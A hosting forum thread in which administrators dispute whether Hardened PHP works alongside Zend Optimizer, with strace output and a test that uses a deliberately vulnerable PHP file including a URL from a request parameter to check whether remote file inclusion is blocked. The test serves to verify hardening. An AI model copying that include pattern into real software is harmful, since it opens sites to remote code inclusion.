I am having trouble compiling PHP 4.3.10 with the new Hardened PHP, if I have the Zend Optimizer (2.5.7) installed. It looks like the two may be incompatible. My question is, what do most hosts do? Do they install Zend Optimizer and not Hardened PHP or install Hardened PHP and not Zend Optimizer? Is there any other alternatives? And forgive me if I am wrong and Zend Optimizer and Hardened PHP can both be installed.

Zend Optimizer is not compatable with hardened php.

I have php 4.3.10 and zend 2.5.7 installed on all of my servers and none of them had and trouble. Have you tried to upgrade php then upgrade zend second? They both should work together fine.

*edit* sorry I did not read it all the way, normal 4.3.10 works fine though.

Dump Hardened PHP like a sack of potatos if you are a host. If it is a choice between the very little security hardened PHP gives you and the things Zend can do, it should be very easy to decided.

Plus, other ways exist to secure the server against what hardened php protects.

The only thing Zend Optimizer really does for you as a shared host is decoding Zend encoded applications.

The script optimizations it makes give a negligible performance benefit for most PHP scripts.

That said - if you need Zend Optimizer (ie. for ModernBill, or another Zend-encoded application), then you shouldn't bother with Hardened-PHP.

Alot of software that hosts use depend on Zend. Modernbill for one. Alot of my clients also need Zend for the decoding though, and they are not hosts.

That said, try upgrading to the latest Zend first. Migth be a problem with that, since PHP 4.3.10 does have problems. ;)

hardened php will segfault php if zend is installed so its not a problem with zends version

Greetings:

We've been using hardened PHP and Zend for several PHP versions including 4.3.10 (we upgraded Zend to the latest prior to the 4.3.10 move).

So far, we've had no segmentation faults or other problems.

Thank you.

dynamicnet,
I do not belive it...

http://sourceforge.net/forum/forum.php?thread_id=1087785&forum_id=368088
http://www.zend.com/phorum/read.php?num=5&id=2958&thread=2933

some proof...

Greetings Steve:

I didn't post for you to believe or to disbelieve.

As stated, we've been running both for some time; and yesterday, I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer) to 4.3.10 (with hardened PHP and the latest Zend).

Whenever we do such upgrades, we test a variety of PHP-based applications; and so far, everything works.

Thank you.

before Zend:

root@w00t [~]# php -v
PHP 4.3.10 (cli) (built: Dec 19 2004 16:07:08)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies
root@w00t [~]#


ok lets install zend:



root@w00t [~]# tail -n 6 /usr/local/lib/php.ini
[Zend]
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2.5.7
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2.5.7
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so
root@w00t [~]#


Nows lets see if php segfaults!



ut oh!?!:

root@w00t [~]# php -v
Segmentation fault (core dumped)
root@w00t [~]#


hrmm so it works ok? I dont think so....


Lets do some investigation with strace.. I ran strace -f php -v and at the end is says:


sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
open("/usr/local/Zend/lib/ZendExtensionManager.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=7724, ...}) = 0
read(3, "\177ELF\1\1\1\tFreeBSD\0\3\0\3\0\1\0\0\0\270\10\0\0004"..., 4096) = 4096
mmap(0, 12288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_NOCORE, 3, 0) = 0x287dd000
mprotect(0x287de000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x287de000, 4096, PROT_READ|PROT_EXEC) = 0
mmap(0x287df000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x287df000
close(3) = 0
access("/usr/lib/libm.so.2", F_OK) = 0
mmap(0, 400, PROT_READ|PROT_WRITE, MAP_ANON, -1, 0) = 0x287e0000
munmap(0x287e0000, 400) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
stat("/usr/local/Zend/lib/Optimizer-2.5.7/php-4.3.x/ZendOptimizer.so", {st_mode=S_IFREG|0755, st_size=551576, ...}) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
mmap(0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0) = 0x287e0000
open("/usr/local/Zend/lib/Optimizer-2.5.7/php-4.3.x/ZendOptimizer.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=551576, ...}) = 0
read(3, "\177ELF\1\1\1\tFreeBSD\0\3\0\3\0\1\0\0\0\240y\1\0004\0"..., 4096) = 4096
mmap(0, 557056, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_NOCORE, 3, 0) = 0x287e9000
mprotect(0x28864000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x28864000, 4096, PROT_READ|PROT_EXEC) = 0
mmap(0x28865000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x7b000) = 0x28865000
mmap(0x2886f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0x2886f000
close(3) = 0
access("/usr/lib/libm.so.2", F_OK) = 0
mprotect(0x287e9000, 507904, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mmap(0, 1968, PROT_READ|PROT_WRITE, MAP_ANON, -1, 0) = 0x28871000
munmap(0x28871000, 1968) = 0
mprotect(0x287e9000, 507904, PROT_READ|PROT_EXEC) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
--- SIGSEGV (Segmentation fault) ---
--- SIGSEGV (Segmentation fault) ---


I know you are still going to deny it but i dont care... just feel good leading people on with inaccurate information.


btw heres the server infos:


Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7e Hardened-PHP/4.3.10

Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.

Ok children....enough of the arguing..lol

Originally posted by dynamicnet
Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.


I love how you can deny everythign when solid facts are given to you... Even the zend developers said it will not work.. and yet you say it does... it sounds like you got into a hole saying it worked and then cant dig your self out...

*cough*
http://www.zend.com/phorum/read.php?num=5&id=2958&thread=2933


The problem is that Hardened PHP changes Zend structures, which makes patched PHP be not binary compatible with original PHP. This is why Zend products do not work with Hardened PHP. I don't think it is possible to do something except making spearate Optimizer build for Hardened PHP - or convincing Hardened PHP makers to make it binary compatible with plain PHP. If you need details on how it isn't compatible - please ask, I'll explain.

DynamicNet,

Do you have anything to show that it is working? From the various sources that I've heard, it doesn't work with Zend. I haven't tried it out myself, as I haven't seen a need to, with the masses saying it doesn't work.

Originally posted by dynamicnet
Greetings Steve:

I didn't post for you to believe or to disbelieve.

As stated, we've been running both for some time; and yesterday, I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer) to 4.3.10 (with hardened PHP and the latest Zend).

Whenever we do such upgrades, we test a variety of PHP-based applications; and so far, everything works.

Thank you.

Hi dynamicnet,

I've been a Hardened-PHP user for some months now since I discovered the patchset when PHP was at 4.3.6/4.3.7 and I have yet to be able to get it to work with Zend Optimizer.

The threads in those forums that Steve posted above were mine asking the authors of both products if the two products were compatible. The authors of both have told me no after their own investigations. According to both the modifications to PHP in the Hardened-PHP patch cause the binary structure to change and since Zend Optimizer circumvents the API of PHP it seg faults.

For the authors of the products and my own benifit, could you detail the process in which you got them to work?

Thank you.

Greetings:

See http://www.zend.com/phorum/read.php?num=5&id=3479&thread=2933

Thank you.

It looks like this compiles, but the security settings of Hardened PHP do not hold. I tried this on two servers, one that had Hardened PHP compiled in with PHP and no Zend Optimizer, the other used the instructions from the above link.

Create a file on an account (for this I used a 3rd independent server). I called this file vul.php:


<?php
print("Hello");
?>


Now on each server create a file (I called vuln.php):


<?php
include $_REQUEST['aktion'];
?>


Now going to the server that just has Hardened PHP compiled and no Zend Optimizer:

http://server1.com/vuln.php?aktion=http://3rdserver.com/vul.php

I get a blank page, which according to the Hardened PHP documentation is what I should get.

Now go to the other server, that has both Zend Optimizer and Hardened PHP installed per the instructions above:

http://server2.com/vuln.php?aktion=http://3rdserver.com/vul.php

and I get a page that says "Hello". Which seems to indicate that Hardened PHP is not installed.

Perhaps I did something wrong, I invite others to try this and let me know if it works for you.

Originally posted by dynamicnet
Greetings:

See http://www.zend.com/phorum/read.php?num=5&id=3479&thread=2933

Thank you.


Yes but please justify your php 4.3.9 comment...


I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)


That posting speaks of nothing but the 4.3.10.


And according to the other poster.... the security features do not hold... please explain that also.

Originally posted by dynamicnet
Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.

LMAO......:evilb: :banana: :clap:

Greetings Steve:

"I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)"

Yes, from 4.3.9 (which was using Hardened PHP and Zend) to 4.3.10.

4.3.9 was upgraded from 4.3.8 (which was also using Hardend PHP and Zend).

Thank you.

Originally posted by dynamicnet
Greetings Steve:

"I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)"

Yes, from 4.3.9 (which was using Hardened PHP and Zend) to 4.3.10.

4.3.9 was upgraded from 4.3.8 (which was also using Hardend PHP and Zend).

Thank you.

Ok can you explain the security functions not working as SPaReK has posted? I will test it shortly to back up his statements.

I can now verify what SPaReK said is true. You defeat the security purpose.

Hm..

Really all thats left to say.. pwned.

//Keep on going, this is getting amusing. :cartman:

Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7e Hardened-PHP/4.3.10


But lets see here (normally way + no zend since it segfaults):


[11:37] <steve|> ok guys
[11:37] <steve|> http://rack911.com/vuln2.php?aktion=http://www.rack911.com/vuln.php
[11:37] <smartass> http://tinyurl.com/5r6de (at rack911.com)
[11:37] <steve|> what comes up
[11:37] <steve|> blank page?
[11:37] <fac3less> pics of naked steve
[11:37] <steve|> come on
[11:37] <fac3less> blank
[11:37] <steve|> ok
[11:37] <fac3less> yep, blank php
[11:37] <fac3less> <html><body></body></html>
[11:38] <steve|> ok cool
[11:38] <steve|> thats hardened php enabled
[11:38] <steve|> lets do it dynamicnets way
[11:38] <steve|> and check it


Ok dynamicnets way


[11:41] <steve|> http://rack911.com/vuln2.php?aktion=http://www.rack911.com/vuln.php
[11:41] <smartass> http://tinyurl.com/5r6de (at rack911.com)
[11:41] <steve|> what happens
[11:41] <fac3less> and he'll complain about it later tonight
[11:41] <fac3less> Hello
[11:42] <steve|> hbaha
[11:42] <steve|> BOOO YAAAA
[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself



Ok dynamicnet.. heres the problem with your way... Just becaue you patch it after it is configured does not mean hardened php is enabled, because the patch adds special functions to the configure script:



server1# ./configure --help | grep hard
--disable-hardened-php-mm-protect Disable the Memory Manager protection.
--disable-hardened-php-ll-protect Disable the Linked List protection.
--disable-hardened-php-inc-protect Disable include/require protection.
--disable-hardened-php-fmt-protect Disable format string protection.
--disable-hardened-php-hash-protect Disable Zend HashTable DTOR protection.
server1#


All of those features are disable by default since you do not run the configure script AFTER its already patched you run it before.


Oh and i know you are going to deny it... so dont even post pls.

Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

Originally posted by dynamicnet
Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

Greetings,

why bring up a post totally unrelated??! Because we showed you were wrong? And you got mad? So now you are going to rub something in my face ?? Thats fun.... I just hope all your clients you installed hardened php on their server know you just gave them a false sense of security.... sad.

Thank you

Originally posted by dynamicnet
Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

This is hardly neccessary or on topic. Can we all act like adults? :rolleyes:

Greetings Nickn:

Out of curiosity, are you the same Nickn on the following?

[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself

You are right, Steve was right, and I am wrong.

Steve, I apologize. I sometimes have trouble with arrogance or tones of arrogance. My response was not necessary.

Lesson learned.

Thank you.

Apology accepted Dynamicnet

Originally posted by dynamicnet
Greetings Nickn:

Out of curiosity, are you the same Nickn on the following?

[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself

You are right, Steve was right, and I am wrong.

Steve, I apologize. I sometimes have trouble with arrogance or tones of arrogance. My response was not necessary.

Lesson learned.

Thank you.

How was I right? I'm not even taking part in this whole discussion..I'm simply stating that bringing in other threads is very childish and not like you.

Actually - that comment was made in #cpanel (with 80 other people) and it wasn't regarding whatever situation is happening here...notice I said all and not just you. However you were the one who started bringing in random threads completely offtopic. :)

Greetings NickN:

As I stated I was wrong.

Thank you.